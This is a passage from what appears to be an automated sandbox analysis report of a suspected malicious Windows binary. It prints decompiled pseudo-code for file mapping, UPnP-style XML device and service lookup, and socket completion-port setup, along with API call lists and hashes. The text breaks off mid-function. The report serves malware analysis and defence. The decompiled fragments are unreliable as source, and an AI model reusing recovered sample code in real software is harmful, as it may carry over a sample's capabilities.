                                                                                  						CloseHandle(_v12);
                                                                                  						goto L14;
                                                                                  					}
                                                                                  					_v20 = GetFileSize(_v8, 0);
                                                                                  					_v24 = _v16;
                                                                                  					while(_v20 != 0) {
                                                                                  						if(_v20 >= 0x100) {
                                                                                  							_t45 = E0040B4F0(_v24, _v24);
                                                                                  							_t67 = _t66 + 4;
                                                                                  							_v28 = _t45;
                                                                                  							if(_v28 != 0) {
                                                                                  								_v20 = _v20 - 0x100;
                                                                                  								if(_v20 >=  *((intOrPtr*)(_v28 + 0xc))) {
                                                                                  									E004040F0(_v24, _v28, _v24,  *((intOrPtr*)(_v28 + 0xc)) + 0x100, 0);
                                                                                  									_t66 = _t67 + 0x10;
                                                                                  									_v20 = _v20 -  *((intOrPtr*)(_v28 + 0xc));
                                                                                  									continue;
                                                                                  								}
                                                                                  								E00408FB0(_v28);
                                                                                  								break;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						break;
                                                                                  					}
                                                                                  					UnmapViewOfFile(_v16);
                                                                                  					goto L13;
                                                                                  				}
                                                                                  				return _t35;
                                                                                  			}

                                                                                  0x0040420b
                                                                                  0x00404225
                                                                                  0x0040422b
                                                                                  0x00404232
                                                                                  0x0040424c
                                                                                  0x00404253
                                                                                  0x0040431b
                                                                                  0x00000000
                                                                                  0x0040431f
                                                                                  0x0040426b
                                                                                  0x00404272
                                                                                  0x00404311
                                                                                  0x00404315
                                                                                  0x00000000
                                                                                  0x00404315
                                                                                  0x00404284
                                                                                  0x0040428a
                                                                                  0x0040428d
                                                                                  0x0040429a
                                                                                  0x004042a2
                                                                                  0x004042a7
                                                                                  0x004042aa
                                                                                  0x004042b1
                                                                                  0x004042be
                                                                                  0x004042ca
                                                                                  0x004042f1
                                                                                  0x004042f6
                                                                                  0x00404302
                                                                                  0x00000000
                                                                                  0x00404302
                                                                                  0x004042d0
                                                                                  0x00000000
                                                                                  0x004042d5
                                                                                  0x00000000
                                                                                  0x004042b3
                                                                                  0x00000000
                                                                                  0x0040429c
                                                                                  0x0040430b
                                                                                  0x00000000
                                                                                  0x0040430b
                                                                                  0x00404328

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(004143F0,?,?,?,?,?,0040686A), ref: 0040420B
                                                                                  • CreateFileW.KERNEL32(00414620,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,0040686A), ref: 00404225
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00404246
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00404265
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040427E
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040430B
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404315
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040431F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                  • String ID:
                                                                                  • API String ID: 3956458805-0
                                                                                  • Opcode ID: b3648e58c9864d6b8b8bc5f3b80ef7b3f109043bc3ac7d8c402e44e73b7fa38e
                                                                                  • Instruction ID: 273e13aa2dc466d5bf8d435bda3035c4f53c51da1c9f1d325813a3c854b8a587
                                                                                  • Opcode Fuzzy Hash: b3648e58c9864d6b8b8bc5f3b80ef7b3f109043bc3ac7d8c402e44e73b7fa38e
                                                                                  • Instruction Fuzzy Hash: 2C3133B4E00209EFDB14DFA4DC49FAEB770AB88704F208569F601772C1D7B96581CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
                                                                                  			E0040CC90(intOrPtr* _a4, WCHAR* _a8) {
                                                                                  				char _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				WCHAR* _v16;
                                                                                  				void* _v20;
                                                                                  				WCHAR* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				WCHAR* _v32;
                                                                                  				intOrPtr* _t65;
                                                                                  				void* _t99;
                                                                                  
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_push( &_v8);
                                                                                  				_push(_a4);
                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_v20 = 0;
                                                                                  						_push( &_v20);
                                                                                  						_push(_v16);
                                                                                  						_push(_a4);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                  							L21:
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_v24 = 0;
                                                                                  							_push( &_v24);
                                                                                  							_push(_v20);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                  								if(lstrcmpiW(_v24, L"device") == 0) {
                                                                                  									_t65 = E0040C5B0(_v20, L"deviceType");
                                                                                  									_t99 = _t99 + 8;
                                                                                  									_v28 = _t65;
                                                                                  									if(_v28 != 0) {
                                                                                  										_v32 = 0;
                                                                                  										_push( &_v32);
                                                                                  										_push(_v28);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                  												_v12 = _v20;
                                                                                  											}
                                                                                  											__imp__#6(_v32);
                                                                                  										}
                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  									}
                                                                                  								}
                                                                                  								__imp__#6(_v24);
                                                                                  							}
                                                                                  							if(_v12 == 0) {
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  								goto L21;
                                                                                  							} else {
                                                                                  							}
                                                                                  						}
                                                                                  						goto L22;
                                                                                  					}
                                                                                  				}
                                                                                  				L22:
                                                                                  				return _v12;
                                                                                  			}

                                                                                  0x0040cc96
                                                                                  0x0040cc9d
                                                                                  0x0040cca7
                                                                                  0x0040ccb0
                                                                                  0x0040ccb8
                                                                                  0x0040ccc8
                                                                                  0x0040ccda
                                                                                  0x0040cce6
                                                                                  0x0040ccf0
                                                                                  0x0040ccf4
                                                                                  0x0040ccfd
                                                                                  0x0040cd05
                                                                                  0x0040cde3
                                                                                  0x0040ccd7
                                                                                  0x00000000
                                                                                  0x0040cd15
                                                                                  0x0040cd15
                                                                                  0x0040cd1f
                                                                                  0x0040cd28
                                                                                  0x0040cd33
                                                                                  0x0040cd54
                                                                                  0x0040cd5f
                                                                                  0x0040cd64
                                                                                  0x0040cd67
                                                                                  0x0040cd6e
                                                                                  0x0040cd70
                                                                                  0x0040cd7a
                                                                                  0x0040cd83
                                                                                  0x0040cd8b
                                                                                  0x0040cda3
                                                                                  0x0040cda8
                                                                                  0x0040cda8
                                                                                  0x0040cdaf
                                                                                  0x0040cdaf
                                                                                  0x0040cdc1
                                                                                  0x0040cdc1
                                                                                  0x0040cd6e
                                                                                  0x0040cdc7
                                                                                  0x0040cdc7
                                                                                  0x0040cdd1
                                                                                  0x0040cde1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cdd3
                                                                                  0x0040cdd1
                                                                                  0x00000000
                                                                                  0x0040cd05
                                                                                  0x0040ccda
                                                                                  0x0040cde8
                                                                                  0x0040cdee

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040CD4C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CD9B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDAF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: device$deviceType
                                                                                  • API String ID: 1602765415-3511266565
                                                                                  • Opcode ID: ea68b65162a0bfbb9c3a4dcc947aafaa99d256b286d0777428a079b1f42d990b
                                                                                  • Instruction ID: 46634be8c8d3b4bec74d72c832fec089d40fd577d228b9d0a634236a651e6f02
                                                                                  • Opcode Fuzzy Hash: ea68b65162a0bfbb9c3a4dcc947aafaa99d256b286d0777428a079b1f42d990b
                                                                                  • Instruction Fuzzy Hash: 2341DA75A0020ADFCB04DF98C884BEFBBB5BF48304F108269E515A7390D778AE81CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
                                                                                  			E0040CAB0(intOrPtr* _a4, WCHAR* _a8) {
                                                                                  				char _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				WCHAR* _v16;
                                                                                  				void* _v20;
                                                                                  				WCHAR* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				WCHAR* _v32;
                                                                                  				intOrPtr* _t65;
                                                                                  				void* _t99;
                                                                                  
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_push( &_v8);
                                                                                  				_push(_a4);
                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_v20 = 0;
                                                                                  						_push( &_v20);
                                                                                  						_push(_v16);
                                                                                  						_push(_a4);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                  							L21:
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_v24 = 0;
                                                                                  							_push( &_v24);
                                                                                  							_push(_v20);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                  								if(lstrcmpiW(_v24, L"service") == 0) {
                                                                                  									_t65 = E0040C5B0(_v20, L"serviceType");
                                                                                  									_t99 = _t99 + 8;
                                                                                  									_v28 = _t65;
                                                                                  									if(_v28 != 0) {
                                                                                  										_v32 = 0;
                                                                                  										_push( &_v32);
                                                                                  										_push(_v28);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                  												_v12 = _v20;
                                                                                  											}
                                                                                  											__imp__#6(_v32);
                                                                                  										}
                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  									}
                                                                                  								}
                                                                                  								__imp__#6(_v24);
                                                                                  							}
                                                                                  							if(_v12 == 0) {
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  								goto L21;
                                                                                  							} else {
                                                                                  							}
                                                                                  						}
                                                                                  						goto L22;
                                                                                  					}
                                                                                  				}
                                                                                  				L22:
                                                                                  				return _v12;
                                                                                  			}

                                                                                  0x0040cab6
                                                                                  0x0040cabd
                                                                                  0x0040cac7
                                                                                  0x0040cad0
                                                                                  0x0040cad8
                                                                                  0x0040cae8
                                                                                  0x0040cafa
                                                                                  0x0040cb06
                                                                                  0x0040cb10
                                                                                  0x0040cb14
                                                                                  0x0040cb1d
                                                                                  0x0040cb25
                                                                                  0x0040cc03
                                                                                  0x0040caf7
                                                                                  0x00000000
                                                                                  0x0040cb35
                                                                                  0x0040cb35
                                                                                  0x0040cb3f
                                                                                  0x0040cb48
                                                                                  0x0040cb53
                                                                                  0x0040cb74
                                                                                  0x0040cb7f
                                                                                  0x0040cb84
                                                                                  0x0040cb87
                                                                                  0x0040cb8e
                                                                                  0x0040cb90
                                                                                  0x0040cb9a
                                                                                  0x0040cba3
                                                                                  0x0040cbab
                                                                                  0x0040cbc3
                                                                                  0x0040cbc8
                                                                                  0x0040cbc8
                                                                                  0x0040cbcf
                                                                                  0x0040cbcf
                                                                                  0x0040cbe1
                                                                                  0x0040cbe1
                                                                                  0x0040cb8e
                                                                                  0x0040cbe7
                                                                                  0x0040cbe7
                                                                                  0x0040cbf1
                                                                                  0x0040cc01
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cbf3
                                                                                  0x0040cbf1
                                                                                  0x00000000
                                                                                  0x0040cb25
                                                                                  0x0040cafa
                                                                                  0x0040cc08
                                                                                  0x0040cc0e

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040CB6C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CBBB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBCF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: service$serviceType
                                                                                  • API String ID: 1602765415-3667235276
                                                                                  • Opcode ID: 51323dc4f173722060747d42b15ee01fc61d8dc6540b40af0163292d053a9315
                                                                                  • Instruction ID: 6fe4328499d7c23ea6979e2b1e9447d84fd35b94008c8ce13c1bdcec141f7028
                                                                                  • Opcode Fuzzy Hash: 51323dc4f173722060747d42b15ee01fc61d8dc6540b40af0163292d053a9315
                                                                                  • Instruction Fuzzy Hash: 3641FB75A0020ADFDB04CF98D885BAFB7B5BF48304F208269E515B7390D778AD85CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 89%
                                                                                  			E0040E330(intOrPtr __eax, void* _a4) {
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t20;
                                                                                  				long _t28;
                                                                                  				long _t37;
                                                                                  				intOrPtr _t45;
                                                                                  				struct _CRITICAL_SECTION* _t48;
                                                                                  				long _t49;
                                                                                  				void* _t53;
                                                                                  				void* _t54;
                                                                                  				void* _t55;
                                                                                  
                                                                                  				_t53 = _a4;
                                                                                  				_t45 = __eax;
                                                                                  				if(_t53 != 0xffffffff) {
                                                                                  					_t48 = __eax + 0x20;
                                                                                  					_t37 = 0;
                                                                                  					EnterCriticalSection(_t48);
                                                                                  					_t20 =  *((intOrPtr*)(_t45 + 0x38));
                                                                                  					if(_t20 != 0) {
                                                                                  						while( *((intOrPtr*)(_t20 + 0x260)) != _t53) {
                                                                                  							_t20 =  *((intOrPtr*)(_t20 + 0x280));
                                                                                  							if(_t20 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  							}
                                                                                  							goto L7;
                                                                                  						}
                                                                                  						_t37 = 1;
                                                                                  					}
                                                                                  					L7:
                                                                                  					LeaveCriticalSection(_t48);
                                                                                  					if(_t37 == 0) {
                                                                                  						_t49 = E00408E40(0x284);
                                                                                  						_t55 = _t54 + 4;
                                                                                  						if(_t49 == 0) {
                                                                                  							L13:
                                                                                  							E00409940(_t53);
                                                                                  							return _t49;
                                                                                  						} else {
                                                                                  							_t7 = _t49 + 0x264; // 0x264
                                                                                  							 *_t49 = 0x69636c69;
                                                                                  							 *(_t49 + 0x260) = _t53;
                                                                                  							_a4 = 0x10;
                                                                                  							__imp__#5(_t53, _t7,  &_a4);
                                                                                  							if(CreateIoCompletionPort( *(_t49 + 0x260),  *(_t45 + 8), _t49, 0) !=  *(_t45 + 8)) {
                                                                                  								E00408FB0(_t49);
                                                                                  								_t55 = _t55 + 4;
                                                                                  								_t49 = 0;
                                                                                  								goto L13;
                                                                                  							} else {
                                                                                  								_t28 = E0040C210();
                                                                                  								_t13 = _t49 + 4; // 0x4
                                                                                  								InterlockedExchange(_t13, _t28);
                                                                                  								_t14 = _t49 + 0x244; // 0x244
                                                                                  								_t15 = _t49 + 8; // 0x8
                                                                                  								 *((intOrPtr*)(_t49 + 0x27c)) = _t45;
                                                                                  								 *((intOrPtr*)(_t49 + 0x224)) = 0x200;
                                                                                  								 *((intOrPtr*)(_t49 + 0x228)) = _t15;
                                                                                  								InitializeCriticalSection(_t14);
                                                                                  								InterlockedIncrement(_t45 + 0x3c);
                                                                                  								E0040E250(_t49);
                                                                                  								return _t49;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						return 0;
                                                                                  					}
                                                                                  				} else {
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}

                                                                                  0x0040e331
                                                                                  0x0040e336
                                                                                  0x0040e33b
                                                                                  0x0040e344
                                                                                  0x0040e348
                                                                                  0x0040e34a
                                                                                  0x0040e350
                                                                                  0x0040e355
                                                                                  0x0040e357
                                                                                  0x0040e35f
                                                                                  0x0040e367
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e369
                                                                                  0x00000000
                                                                                  0x0040e367
                                                                                  0x0040e36b
                                                                                  0x0040e36b
                                                                                  0x0040e36d
                                                                                  0x0040e36e
                                                                                  0x0040e376
                                                                                  0x0040e389
                                                                                  0x0040e38b
                                                                                  0x0040e390
                                                                                  0x0040e42d
                                                                                  0x0040e42e
                                                                                  0x0040e43c
                                                                                  0x0040e396
                                                                                  0x0040e39b
                                                                                  0x0040e3a3
                                                                                  0x0040e3a9
                                                                                  0x0040e3af
                                                                                  0x0040e3b7
                                                                                  0x0040e3d4
                                                                                  0x0040e423
                                                                                  0x0040e428
                                                                                  0x0040e42b
                                                                                  0x00000000
                                                                                  0x0040e3d6
                                                                                  0x0040e3d6
                                                                                  0x0040e3dc
                                                                                  0x0040e3e0
                                                                                  0x0040e3e6
                                                                                  0x0040e3ec
                                                                                  0x0040e3f0
                                                                                  0x0040e3f6
                                                                                  0x0040e400
                                                                                  0x0040e406
                                                                                  0x0040e410
                                                                                  0x0040e416
                                                                                  0x0040e421
                                                                                  0x0040e421
                                                                                  0x0040e3d4
                                                                                  0x0040e378
                                                                                  0x0040e37e
                                                                                  0x0040e37e
                                                                                  0x0040e33e
                                                                                  0x0040e341
                                                                                  0x0040e341

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040E83B,00000000), ref: 0040E34A
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E83B,00000000), ref: 0040E36E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3168844106-0
                                                                                  • Opcode ID: 4c18b106db5567132990545b499aae1f321c72ca226fb5bf17456008ad49864f
                                                                                  • Instruction ID: 62d1bf2d84e0e1ba2e0a99c8f5ab924b94ee3ffd36670832191e74fbf46375e2
                                                                                  • Opcode Fuzzy Hash: 4c18b106db5567132990545b499aae1f321c72ca226fb5bf17456008ad49864f
                                                                                  • Instruction Fuzzy Hash: F231D172201605ABC310ABB6EC48AD7B7E8FB44724F04893EF95DD3251DB39A4548B98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E0040CCD1() {
                                                                                  				void* _t85;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                  						break;
                                                                                  					}
                                                                                  					L2:
                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                  					_push(_t85 - 0x10);
                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                  						L18:
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						L4:
                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                  						_push(_t85 - 0x14);
                                                                                  						_push( *(_t85 - 0x10));
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                  							L6:
                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"device") == 0) {
                                                                                  								L7:
                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040C5B0( *(_t85 - 0x10), L"deviceType");
                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                  									L8:
                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                  									_push(_t85 - 0x1c);
                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                  										L10:
                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                  										}
                                                                                  										L12:
                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                  									}
                                                                                  									L13:
                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  								}
                                                                                  							}
                                                                                  							L14:
                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                  						}
                                                                                  						L15:
                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                  							L17:
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                  							goto L18;
                                                                                  						}
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				L19:
                                                                                  				return  *(_t85 - 8);
                                                                                  			}





                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040CD4C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CD9B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDAF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: device$deviceType
                                                                                  • API String ID: 1602765415-3511266565
                                                                                  • Opcode ID: c34f562bf250ec4fdba221dbdec4349d49427810adf770fab84b3680e3f9f1ae
                                                                                  • Instruction ID: 6e690da79745c02a31a5bb20c3c2194b08e0ef47a7b2c4a2d0bea9277cba1ccd
                                                                                  • Opcode Fuzzy Hash: c34f562bf250ec4fdba221dbdec4349d49427810adf770fab84b3680e3f9f1ae
                                                                                  • Instruction Fuzzy Hash: 5A31CA75A1020ADFCB04DF99D884BEFBBB5BF88304F108669E515B7390D778A981CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E0040CAF1() {
                                                                                  				void* _t85;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                  						break;
                                                                                  					}
                                                                                  					L2:
                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                  					_push(_t85 - 0x10);
                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) { // vtable+0x1c on the list (MSXML layout): IXMLDOMNodeList::get_item(index, &node); skip on failure or NULL
                                                                                  						L18:
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						L4:
                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                  						_push(_t85 - 0x14);
                                                                                  						_push( *(_t85 - 0x10));
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) { // vtable+0xa4: IXMLDOMNode::get_baseName(&name), the element name without namespace prefix
                                                                                  							L6:
                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"service") == 0) {
                                                                                  								L7:
                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040C5B0( *(_t85 - 0x10), L"serviceType");
                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                  									L8:
                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                  									_push(_t85 - 0x1c);
                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) { // vtable+0x68: IXMLDOMNode::get_text(&text) on the serviceType child
                                                                                  										L10:
                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                  										}
                                                                                  										L12:
                                                                                  										__imp__#6( *(_t85 - 0x1c)); // OLEAUT32 ordinal 6 == SysFreeString (see APIs below): free the serviceType text
                                                                                  									}
                                                                                  									L13:
                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18))); // vtable+8: IUnknown::Release on the child node
                                                                                  								}
                                                                                  							}
                                                                                  							L14:
                                                                                  							__imp__#6( *(_t85 - 0x14)); // SysFreeString: free the node's base name
                                                                                  						}
                                                                                  						L15:
                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                  							L17:
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10)); // Release the node unless it was kept as the result; the loop then stops on a match
